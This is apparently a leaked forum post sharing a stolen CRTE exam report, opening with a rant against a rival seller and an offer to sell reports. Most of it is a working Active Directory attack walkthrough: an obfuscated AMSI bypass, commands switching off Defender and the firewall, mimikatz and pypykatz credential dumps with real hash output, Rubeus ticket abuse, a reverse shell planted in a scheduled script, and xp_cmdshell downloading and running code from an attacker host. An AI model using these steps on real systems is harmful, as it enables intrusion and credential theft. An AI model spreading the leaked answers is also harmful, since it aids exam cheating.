Hi,

It's maze runner with another leak. This time I bring you the New CRTE Exam Report
(CITADEL.CORP and GLACIS.CORP).

Reason For Leak : The mf from exam market selling it for 400,500 vice versa. Especially the
guy Marble_cig11, I don't like this kinda cunt people. Listen Marble idiot, Don't drag any other
sellers into your sale, You can say you have the best report but doesn't mean you are the one
who has best in the world, You're just another piece of shit for me. If you do it again then
next leak will be your CRTO and PACES report and Your Fake Cobalt Strike, already got those
two waiting for leak.

How this idiot lied to their customers,

CRTE - "I took 8 times CRTE exam to make this report ", "I have the real report, others just
reselling mine", "Me and other shit guy are real, rest of the sellers are scammers." and
finally "I used POM as a MM blah blah"

CRTO - "You need to complile CS binary in VS to evade AV", "Daily having Exams", "blah
blah"

Finally these are the ultimate I own Everything.., If you give me positive rep I'll give you 30
rep.

This guy lies a lot, Don't know about cooling period in CRTE. Besides this Report is same as
the other guy in the market.

Leaks Contributors so far (aka Legends):

1. @leopard_00
2. @MrXmen
3. @samy_le
4. @whoami.01
5. @rangnarok
6. @Adispy
7. @omegade

If you want to buy the Reports for Cheap Price DM me on Discord

maze_runner#0964
 CRTE EX
So let’s get started! This is our network to hack!

Notes (keep in mind to do always AMSI bypass to be safe! That’s the new one that
doesn’t get flagged <3 )
Note2 → If a command / script is not working, run the AMSI BYPASS FIRST , or
check POWERSHELL IS INVOKED AS ADMIN (this is basic knowledge here, so I
expect you know this , but had to state it here to be clear! )

First of all keep this you will use a lot →

AMSI Bypass :

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','r

E' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}
{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'t
o'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',
('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Pub
l'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Close Firewall :

Set-MpPreference -DisableIOAVProtection $true

CRTE EX 1
 Set-MpPreference -DisableRealtimeMonitoring $true

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Or in cmd :

netsh advfirewall set allprofiles state off

Also if you want to “play” in Rdesktop →

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name

"fDenyTSConnections" -value 0

Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Disable-NetFirewallRule -DisplayGroup "Remote Desktop"

net localgroup "remote desktop users"

Add-LocalGroupMember -Group "Remote Desktop Users" -Member "pastudentXX"

EXAM STARTING

You will have to take AD-MODULE on the machine to be able to enumerate it .

Import .dll module , and .ps1 module as in the training material course.

1. User ServicePrincipalName

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

CRTE EX 2
 2. Users

Get-ADUser -Filter *

DistinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : Administrator
ObjectClass : user
ObjectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
Surname :
UserPrincipalName :

DistinguishedName : CN=Guest,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : Guest
ObjectClass : user
ObjectGUID : 26bb7559-371b-461d-936a-fcd25c4fad8b
SamAccountName : Guest
SID : S-1-5-21-253487801-221673152-1815095224-501
Surname :
UserPrincipalName :

DistinguishedName : CN=krbtgt,CN=Users,DC=citadel,DC=corp
Enabled : False
GivenName :
Name : krbtgt
ObjectClass : user
ObjectGUID : 044cb80a-2a72-4a26-bde8-353d8b3a8df9
SamAccountName : krbtgt
SID : S-1-5-21-253487801-221673152-1815095224-502
Surname :
UserPrincipalName :

DistinguishedName : CN=share manager,CN=Users,DC=citadel,DC=corp

Enabled : True
GivenName : share
Name : share manager
ObjectClass : user
ObjectGUID : e3cbc534-0d57-43b9-8911-1fa7f7385660
SamAccountName : sharemanager
SID : S-1-5-21-253487801-221673152-1815095224-1109
Surname : manager
UserPrincipalName : sharemanager

DistinguishedName : CN=sql connector,CN=Users,DC=citadel,DC=corp

Enabled : True
GivenName : sql
Name : sql connector
ObjectClass : user
ObjectGUID : 021fd657-6fa9-478b-8c8f-218a82499854

CRTE EX 3
 SamAccountName : sqlconnector
SID : S-1-5-21-253487801-221673152-1815095224-1110
Surname : connector
UserPrincipalName : sqlconnector

DistinguishedName : CN=GLACIS$,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName :
Name : GLACIS$
ObjectClass : user
ObjectGUID : 2b70b2a3-5a9f-461d-830e-7d4906f3300c
SamAccountName : GLACIS$
SID : S-1-5-21-253487801-221673152-1815095224-1111
Surname :
UserPrincipalName :

DistinguishedName : CN=studentuser,CN=Users,DC=citadel,DC=corp
Enabled : True
GivenName : studentuser
Name : studentuser
ObjectClass : user
ObjectGUID : ec7c5a26-eb2c-4175-9917-216e1fbb1fbc
SamAccountName : studentuser
SID : S-1-5-21-253487801-221673152-1815095224-1113
Surname :
UserPrincipalName : studentuser@citadel.corp

3. Samaccountnames

Get-ADUser -Filter * -Properties *| select Samaccountname,Description

Samaccountname Description
-------------- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
krbtgt Key Distribution Center Service Account
sharemanager
sqlconnector
GLACIS$
studentuser

4. Computernames

Get-ADComputer -Filter *

DistinguishedName : CN=CITADEL-DC,OU=Domain Controllers,DC=citadel,DC=corp

DNSHostName : citadel-dc.citadel.corp
Enabled : True
Name : CITADEL-DC
ObjectClass : computer
ObjectGUID : aed36284-8dfd-458d-83af-befa42538a21

CRTE EX 4
 SamAccountName : CITADEL-DC$
SID : S-1-5-21-253487801-221673152-1815095224-1000
UserPrincipalName :

DistinguishedName : CN=PAWSRV,CN=Computers,DC=citadel,DC=corp
DNSHostName : pawsrv.citadel.corp
Enabled : True
Name : PAWSRV
ObjectClass : computer
ObjectGUID : 6031ac79-7b02-4996-bf53-91de6c0c6066
SamAccountName : PAWSRV$
SID : S-1-5-21-253487801-221673152-1815095224-1104
UserPrincipalName :

DistinguishedName : CN=EXAMVM,CN=Computers,DC=citadel,DC=corp
DNSHostName : examvm.citadel.corp
Enabled : True
Name : EXAMVM
ObjectClass : computer
ObjectGUID : d14c6ca8-f1aa-42a7-b14d-11b4287a3347
SamAccountName : EXAMVM$
SID : S-1-5-21-253487801-221673152-1815095224-1105
UserPrincipalName :

DistinguishedName : CN=SRV71,OU=Servers,DC=citadel,DC=corp
DNSHostName : srv71.citadel.corp
Enabled : True
Name : SRV71
ObjectClass : computer
ObjectGUID : a0b9d4b8-e51b-4421-a6dd-19500a851987
SamAccountName : SRV71$
SID : S-1-5-21-253487801-221673152-1815095224-1106
UserPrincipalName :

5. Members of Domain Admins

Get-ADGroupMember -Identity 'Domain Admins'

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp
name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500

6. Members of Enterprise Admins

Get-ADGroupMember -Identity 'Enterprise Admins' -Server citadel.corp

distinguishedName : CN=Administrator,CN=Users,DC=citadel,DC=corp

CRTE EX 5
 name : Administrator
objectClass : user
objectGUID : 6c2f09d7-72ba-4188-ac99-5f07525c069a
SamAccountName : Administrator
SID : S-1-5-21-253487801-221673152-1815095224-500
SourceName : citadel.corp
TargetName : glacis.corp
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional

7. Trusts

Get-ADTrust -Filter *

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False
Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

8. Forests

Get-ADForest | %{Get-ADTrust -Filter *}

Direction : BiDirectional
DisallowTransivity : False
DistinguishedName : CN=glacis.corp,CN=System,DC=citadel,DC=corp
ForestTransitive : True
IntraForest : False
IsTreeParent : False
IsTreeRoot : False

CRTE EX 6
 Name : glacis.corp
ObjectClass : trustedDomain
ObjectGUID : fd4a8a31-c6bb-4a27-97d8-2ff0d543055e
SelectiveAuthentication : False
SIDFilteringForestAware : False
SIDFilteringQuarantined : False
Source : DC=citadel,DC=corp
Target : glacis.corp
TGTDelegation : False
TrustAttributes : 8
TrustedPolicy :
TrustingPolicy :
TrustType : Uplevel
UplevelOnly : False
UsesAESKeys : False
UsesRC4Encryption : False

EXAMVM PRIVILEGE ESCALATIO

You can do SharpHound on the EXAMVM

Sharphound.exe -CollectionMethods -all

!!!! → Make sure you have the latest version of neo4j and bloodhound , cause the
latest SharpHound.exe got updated !

Also, I recommend you to use BloodHound on your personal PC , don’t install it on

the EXAMVM .

It’s up to you to install it, no need to make notes here cause it’s out of the subject
and simple enough (basic knowledge in the training material) .

After importing the .zip file in Bloodhound , checking studentuser .

You will seee it has GenericWrite on CompanyAdministrators@citadel.corp

SO , first thing we add it and give admin rights !

CRTE EX 7
 net group "CompanyAdministrators" studentuser /add /domain

After that we log out or restart the EXAMVM .

We check to see if we can now spawn powershell as an ADMIN , so you go to start,

powershell , right click and open as administrator.
If you aren’t asked for a password to open it, you are admin.

IF not , repeat the steps (I mean restart, log out-log in).

DUMPING THE HASHES NOW ON EXAMVM! BEFORE DOING THIS DISABLE

WITH THE CODES YOU HAVE UP THE AV / DEFENDER !

We will use pypykatz.exe

pypykatz.exe live lsa

This prints all credentials to STDOUT (see image, run in powershell opened as
Administrator! ) →

CRTE EX 8
 So now , we got for sharemanager

NTLM → ad1b41d88cfd57b08f0fb50b1eee2541

PASSWORD → Us3dForControllingFilesAcrossCitadel!

GETTING IN SERV71

Having the NTLM hash of sharemanager let’s ask for a ticket to access the damn
machine →
We will use Rubeus.exe here

.\Rubeus.exe asktgt /user:sharemanager /rc4:ad1b41d88cfd57b08f0fb50b1eee2541 /ptt

CRTE EX 9
 Doing a lot of digging, but using the following I noticed that at any 5 minutes there is
a ps1 script there that starts .
We can edit that script now cause we impersonated sharemanager . Like that we will
get a reverse shell !

Finding the folder shared with the script in it :

Find-DomainShare -CheckShareAccess

dir \\srv71.citadel.corp\ScheduledQueries

CRTE EX 10
 Checking the content of the Queries.ps1 :

type Queries.ps1

# This PowerShell script runs every 5 minutes to check sqlsrv3 (192.168.37.3) status
Import-Module SqlServer
EXECUTE (
SELECT name AS [sqlsrv3DB],
DATABASEPROPERTY(name, N'Issqlsrv3') AS [sqlsrv3],
DATABASEPROPERTY(name, N'IsOffline') AS [Offline],
DATABASEPROPERTY(name, N'IsEmergencyMode') AS [Emergency],
has_dbaccess(name) AS [HasDBAccess]
FROM sysdatabases
WHERE (DATABASEPROPERTY(name, N'Issqlsrv3') = 1)
OR (DATABASEPROPERTY(name, N'IsOffline') = 1)
OR (DATABASEPROPERTY(name, N'IsEmergencyMode') = 1)
OR (has_dbaccess(name) = 0)
) AT SQLSRV3
GO
---snip-----
---snip-----

Change the Queries.ps1 with Invoke-PowerShellTcpEx.ps1 script . That’s how you

get the reverse shell

Notepad.exe Queries.ps1

CRTE EX 11
 After edit it , hit CTRL+S .
Remember to add at the end of the Queries.ps1 where you copy-pasted the Invoke-
PowerShellTcpEx.ps1 the last line should be :

reverse -Reverse -IPAddress 192.168.X.X -Port 443

Where 192.168.X.X it’s your IP address, make sure to be correct.

Now, open in your EXAMVM new window of powershell , bypasss AMSI as usual ,
and import powercat !

Then open a listening port 443 and wait for the shell (from 5 to 5 minutes)

SRV71 - we are in!

SQL SRV3

I disabled AMSI again (as sqlconnector), just to be sure, and load up PowerUpSQL
to enumerate further.
PowerUpSQL includes functions that support SQL Server discovery, weak
configuration auditing, privilege escalation on scale, and

post exploitation actions such as OS command execution. It is intended to be used

during internal penetration tests and red team

CRTE EX 12
 engagements. However, PowerUpSQL also includes many functions that can be
used by administrators to quickly inventory the
SQL Servers in their ADS domain and perform common threat hunting tasks related
to SQL Server.
Host PowerupSQL.ps1 with HFS.exe

IEX(New-Object Net.WebClient).downloadString("http://YOURHOSTINGIP/PowerUpSQL.ps1")
Invoke-SQLAudit -Verbose -Instance "SQLSRV3.glacis.corp"

!If you get error, use AMSI first!

We get that’s vulnerable and exaploitable! Result of the query! →

In the same Powershell window opened as Administrator :

Invoke-SQLAuditPrivImpersonateLogin -Instance SQLSRV4.glacis.corp -Exploit

Result should be:

CRTE EX 13
 Also in the same result it stated that sqlsrv3adm can impersonate the sa SYSADMIN
login!

The address of SQLSRV3.glacis.corp is 192.168.37.3 ! Please check to be sure your

is the same, if not just change it in the future commands!
To find it out you just ping :

ping SQLSRV3.glacis.corp

Now let’s reconfigure xp_cmdshell and giving as the right to get the shell back to our
EXAMVM!

Get-SQLQuery -Verbose -instance "192.168.37.3" -Query "EXECUTE AS LOGIN = 'sqlsrv3ad

m';EXECUTE AS LOGIN = 'sa'; EXECUTE sp_configure 'show advanced options', 1" -User ci
tadel\sqlconnector

Get-SQLQuery -Verbose -instance "192.168.37.3" -Query "EXECUTE AS LOGIN = 'sqlsrv3ad

m';EXECUTE AS LOGIN = 'sa'; EXECUTE sp_configure 'xp_cmdshell', 1" -User citadel\sqlc
onnector

Get-SQLQuery -Verbose -instance "192.168.37.3" -Query "EXECUTE AS LOGIN = 'sqlsrv3ad

m';EXECUTE AS LOGIN = 'sa';RECONFIGURE " -User citadel\sqlconnector

Get-SQLQuery -Verbose -instance "192.168.37.3" -Query "EXECUTE AS LOGIN = 'sqlsrv3ad

m';EXECUTE AS LOGIN = 'sa';exec xp_cmdshell 'hostname' " -User citadel\sqlconnector

CRTE EX 14
 NOW LET”S SHELL BACK using the SAME Invoke-PowerShellTcp.ps1 script we
used before and it’s already hosted on EXAMVM with HFS.exe BUT MAKE SURE
TO CHANGE THE PORT FROM 443 TO 1337 !
Now on the EXAMVM we do this

On the powershell where we can access sqlsrv3adm do →

Get-SQLQuery -Verbose -instance "192.168.37.3" -Query “EXECUTE AS LOGIN = 'sqlsrv3ad

m';EXECUTE AS LOGIN = 'sa';exec xp_cmdshell 'powershell iex (New-Object Net.WebClien
t).DownloadString(''http://192.168.100.1/Invoke-PowerShellTcp.ps1'')'” -User citadel
\sqlconnector

Being on glacis now, you should do Bloodhound again to get MORE LOOT! (repeat
the steps with which we started! )
To copy it to our EXAMVM machine the .zip do →

cp \\srv71.citadel.corp\<the location of the .zip file for bloodhound>\11287618_glaci

s.zip .

GLACIS-DC

CRTE EX 15
 Importing the .zip to BloodHound we can search DBMASTER@GLACIS.CORP and
we see that this has AllowedToDelegate to S-1-5-21-525452939-2440030252-
119246627301000….
In powershell do :

Get-DomainUser -TrustedToAuth

You will get result that dbmaster has delegation to dc-glacis! (forgot to screenshot it,
sorry!)
Just screenshot the output of this command and you are good!

Now let’s dump dbmaster hashes using mimikatz in memory

IEX(New-Object Net.WebClient).downloadString("http://192.158.X.X/Invoke-Mimikatz.ps
1");Invoke-Mimikatz

You get directly the password for dbmaster!

CRTE EX 16
 So creds are dbmaster / 1SQKSrvAdmin!
Also got hash → SQLSRV3$ / 65e3579eb3f8b6445b7d3600374da099

Exit mimikatz, now going to use Rubeus in the same window where we used
mimikatz. We upload Rubeus.exe using HFS.exe as we always host files.

wget http://192.168.X.X/Rubeus.exe -o Rubeus.exe

CRTE EX 17
 Now we can impersonate Administrator with the hash we got using Rubeus ! →

.\Rubeus.exe s4u /user:dbmaster /rc4:1a0693ca4d6482238e5e6f46c36950ea /impersonateuse

r:Administrator /msdsspn:time/glacis-dc /domain:glacis.corp /altservice:ldap /ptt

ONLY after this we can use the DCSYNC rights that we have to be able to get the
dump for Admin!

Like this , using SafetyKatz.exe ! (you know the drill , amsy bypass, upload file, etc ,
repeated steps , no need to tell them each time! )

privilege::debug

.\SafetyKatz.exe "lsadump::dcsync /user:glacis\krbtgt" "exit"

CRTE EX 18
 From training PDF i did this to exploit more and dump glacis-dc ! (skill in mimikatz
guys & girls) !

.\SafetyKatz.exe "lsadump::dcsync /user:glacis\glacis-dc$" "exit"

.\SafetyKatz.exe "lsadump::dcsync /user:glacis\Administrator" "exit"

.\SafetyKatz.exe "lsadump::dcsync /user:glacis\krbtgt" "exit"

Now let’s be more aggresive! →

.\SafetyKatz.exe "!+" "privilege::debug" "lsadump::dcsync /user:krbtgt" "exit"

[*] Dumping lsass (680) to C:\Windows\Temp\debug.bin

CRTE EX 19
 [+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:krbtgt

[DC] 'glacis.corp' will be the domain
[DC] 'glacis-dc.glacis.corp' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2/9/2022 7:54:06 AM
Object Security ID : S-1-5-21-525452939-2440030252-1192466273-502
Object Relative ID : 502

Credentials:
Hash NTLM: cc4c3a8d4cc72cf9a07be33810f8f901
ntlm- 0: cc4c3a8d4cc72cf9a07be33810f8f901
lm - 0: 50f08dbb35800eac3225a1172aaa5405

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 328ceb6ae37e224951657e70dd66402b

* Primary:Kerberos-Newer-Keys *
Default Salt : GLACIS.CORPkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 4383bf4fe5c0e5396ba456d1872aa8d81069f02eaf0b6768337e2
7a8939ac4b3
aes128_hmac (4096) : 3b0dbb9652ac46718f4888105191fda3
des_cbc_md5 (4096) : f8b08357431f54a2

* Primary:Kerberos *
Default Salt : GLACIS.CORPkrbtgt
Credentials
des_cbc_md5 : f8b08357431f54a2

CRTE EX 20
 * Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 400b57c73cdee4a650e0d6ee8b7dac44
02 ebe3e70a78631f2612b0fc92bddb9cda
03 179abf081b9572b002208569986fcda5
04 400b57c73cdee4a650e0d6ee8b7dac44
05 ebe3e70a78631f2612b0fc92bddb9cda
06 061c1458c871646d2390d5295fe0ee23
07 400b57c73cdee4a650e0d6ee8b7dac44
08 10f2cfe52e3107856953a4af4fb3e9a3
09 10f2cfe52e3107856953a4af4fb3e9a3
10 e274af5fef8d62b1a391fed520fc46b7
11 fa716ccc30f3e56c78da6029248999f3
12 10f2cfe52e3107856953a4af4fb3e9a3
13 91c3b1a4f986a9031b268f7e22459cd7
14 fa716ccc30f3e56c78da6029248999f3
15 6d7c985dd4c83c93c495b73c5c5e87c5
16 6d7c985dd4c83c93c495b73c5c5e87c5
17 08eee2f50ed812266d6c8f5157a41360
18 ca35b8118b1d4475c75249fb9c6151a0
19 570155c56a0fc982c60d2e791defd612
20 620ae90a4e0a539220997630b4c7a05e
21 dc31f3c019df20db8d1812c54cd1421c
22 dc31f3c019df20db8d1812c54cd1421c
23 165b6117651b97bd447a58c3a8833fed
24 d83024cd3028bb0512464d32e5a6ff7a
25 d83024cd3028bb0512464d32e5a6ff7a
26 bd989754a5d654819ad1dc23ec7a12f4
27 aae175c2add86e4906bf728541bcf984
28 5abc0aecccd0f38c505d2a08ba7a9b82
29 926b7e59d1b3ab73380f34af3c3c0999

mimikatz(commandline) # exit
Bye!

Doing the same for dc-glacis →

.\SafetyKatz.exe "!+" "privilege::debug" "lsadump::dcsync /user:glacis\glacis-dc$" "ex

it"

[*] Dumping lsass (680) to C:\Windows\Temp\debug.bin

[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64)

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz

CRTE EX 21
 '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:glacis\glacis-dc$

[DC] 'glacis.corp' will be the domain
[DC] 'glacis-dc.glacis.corp' will be the DC server
[DC] 'glacis\glacis-dc$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : GLACIS-DC

** SAM ACCOUNT **

SAM Username : GLACIS-DC$

Account Type : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration :
Password last change :
Object Security ID : S-1-5-21-525452939-2440030252-1192466273-1000
Object Relative ID : 1000

Credentials:
Hash NTLM: 72a477ffc0816c78baa5d6a73ac81e87
ntlm- 0: 72a477ffc0816c78baa5d6a73ac81e87
ntlm- 1: f685de874638874583d459fd3cd723d8
ntlm- 2: b22692a004ecb40bd8fcd4cd8a5f82c3
ntlm- 3: 9a70509a7799d67e1c6f62df1c0da948
ntlm- 4: 456a0cd6d7649ca619705362b3245a58
ntlm- 5: 0ddc74fb6ac996878300bdf5451fbe43
lm - 0: 9df0a58c60f76c2bce318c01977a7305
lm - 1: b0365aef32eae05d849512198f18649f
lm - 2: 6e736abb3459cae753584e021d434eb1
lm - 3: 1974afae9af17b316648b84f495a763f
lm - 4: 545e9f24decacecaf71816f226fb694d

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : GLACIS.CORPhostglacis-dc.glacis.corp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c12b44a91899605bb082b7fcf19e240191f3972035711c333dcfd
a4fcf374081
aes128_hmac (4096) : d701914dd7f5791e3d31b0c70980edc8
des_cbc_md5 (4096) : f237389bd3e64075
OldCredentials
aes256_hmac (4096) : 8e8c2a86fce405ff087cf5d0afa65b0ae4fa459a4510342c1709d
137e8c14617
aes128_hmac (4096) : 6032a84db0878bc0060495b4e96ebd61
des_cbc_md5 (4096) : e55b2f4c37973792
OlderCredentials

CRTE EX 22
 aes256_hmac (4096) : 2f2fa341b0f74918b10b49942f43542af741c0a1ed5e9ee98317a
ea701342f43
aes128_hmac (4096) : 0dca74a3fc2959c37673af8005750763
des_cbc_md5 (4096) : f8cece9bfb98c7e5

* Primary:Kerberos *
Default Salt : GLACIS.CORPhostglacis-dc.glacis.corp
Credentials
des_cbc_md5 : f237389bd3e64075
OldCredentials
des_cbc_md5 : e55b2f4c37973792

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 6284ab0dd3812efd5a88b5105d4ebdfb
02 781cf64499c61b33c483a09ed4ad336c
03 6284ab0dd3812efd5a88b5105d4ebdfb
04 6284ab0dd3812efd5a88b5105d4ebdfb
05 c263cc816f8be1ab606035f10f9852bf
06 c263cc816f8be1ab606035f10f9852bf
07 6fa58d035018e7e79f6d24925fc88a8b
08 9aa8c592312cf15eaf0e0e85b0d4099d
09 d5efc49851800e1430dc9b8c071dfe42
10 1651b257cabf5aff42583a48dbcb7db9
11 1651b257cabf5aff42583a48dbcb7db9
12 9aa8c592312cf15eaf0e0e85b0d4099d
13 9aa8c592312cf15eaf0e0e85b0d4099d
14 a546dc557a5fc96995f73aee6070835d
15 adda246f7cf41876344a39f3747882b8
16 5def767045476ce0a46f0a50d34e0102
17 9a920d9633da4c03b548209f964d7d69
18 3fa6c5a20947ef70dc5470eb18d4e78e
19 4809c62284d4798cc0c4e3d7bc41ff43
20 3fa6c5a20947ef70dc5470eb18d4e78e
21 b62f35882ee39daa82264edbce447475
22 6c0c66cd2823b433e5669f9d3c27103d
23 b62f35882ee39daa82264edbce447475
24 060a96bc863f59a0358583efa7631ab7
25 3db06e2ab638f19afe918568a626e41a
26 b6c4fc7f472e47265c9acb3652db2bc6
27 7562d2430f0ca7883b5dd4ed633539a2
28 0f08d6e9739851d7c7709bd552c15c1b
29 7562d2430f0ca7883b5dd4ed633539a2

mimikatz(commandline) # exit
Bye!

Let’s go for Administrator too , cause we want to fuck it up bad 💀

CRTE EX 23
 .\SafetyKatz.exe "!+" "privilege::debug" "lsadump::dcsync /user:glacis\administrator"
"exit"

[*] Dumping lsass (680) to C:\Windows\Temp\debug.bin

[+] Dump successful!

[*] Executing loaded Mimikatz PE

.#####. mimikatz 2.2.0 (x64)

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # !+
[+] 'mimidrv' service already registered
[*] 'mimidrv' service already started

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:glacis\administrator

[DC] 'glacis.corp' will be the domain
[DC] 'glacis-dc.glacis.corp' will be the DC server
[DC] 'glacis\administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : Administrator

** SAM ACCOUNT **

SAM Username : Administrator

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change :
Object Security ID : S-1-5-21-525452939-2440030252-1192466273-500
Object Relative ID : 500

Credentials:
Hash NTLM: 3bb32a944573427d3abeb19be73745ef

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : c805b4214b0f809760bc2bee2d4051a0

* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-EVPSMQ3QIQKAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f686871eaea8c5446a9010859ee76364ebdb47c3eb3f9d935e671
84a7c06dc6b
aes128_hmac (4096) : 6ffe6c450cf36f010fe8dfb4089562ca
des_cbc_md5 (4096) : 16a449a886ad9810

CRTE EX 24
 OldCredentials
aes256_hmac (4096) : 7446f1d906a576f6bac344e90156595b6de661da4af0379d8ddbe
185b4f4e7d9
aes128_hmac (4096) : f0f2eb741791ab4a5b57cb43bc836e05
des_cbc_md5 (4096) : 0d4991f1aebcae75
OlderCredentials
aes256_hmac (4096) : d4d4f28bd5cef101979deb1125e65a016782f709f65e27d239f01
2cb312262c7
aes128_hmac (4096) : 05a9e72e6ca72276fcad3081df0a8c14
des_cbc_md5 (4096) : bf3410ecbc01379d

* Packages *
NTLM-Strong-NTOWF

* Primary:Kerberos *
Default Salt : WIN-EVPSMQ3QIQKAdministrator
Credentials
des_cbc_md5 : 16a449a886ad9810
OldCredentials
des_cbc_md5 : 0d4991f1aebcae75

mimikatz(commandline) # exit
Bye!

Checking BloodHound more , we see that GLACIS-DC.GLACIS.CORP is able to add

user to the group PAWADMINS !!
So we do this to spawn a powershell as glacis-dc :

.\SafetyKatz.exe "sekurlsa::pth /user:glacis-dc$ /domain:glacis.corp /ntlm:72a477ffc08

16c78baa5d6a73ac81e87 /run:powershell.exe" "exit"

Now in the new powershell windows that’s opened add studentuser →

net group PAWADMINS studenuser /domain /add

CRTE EX 25
 PAWSRV

Let’s get hash of studentuser using SagetyKatz.exe :

.\SafetyKatz.exe "sekurlsa::logonpassword" "exit"

Result :

Now let’s put in use the NTLM to open a powershell on citadel.corp :

.\SafetyKatz.exe "sekurlsa::pth /user:studentuser /domain:CITADEL.CORP /ntlm:c24534933

b2765041c83c4c2efd034c2 /run:powershell.exe"

On the new Powershell window we access PAWSRV

Enter-PSSession PAWSRV

CRTE EX 26
 Now add studentuser to pwadmins group and check if it’s ok doing a whoami

net group "pawadmins" studentuser /add /domain

whoami /all

CITADEL-DC (last devil in town)

Again after enumeration / Bloodhound (you pick your screenshots however you
want) , you will see that PAWSRV has DCSync Rights in CITADEL.CORP !!!
First upload Invoke-Mimikatz.ps1 (as always like we did upper )

Then do :

wget http://192.168.X.X/Invoke-Mimikatz.ps1 -o Invoke-Mimikatz.ps2

CRTE EX 27
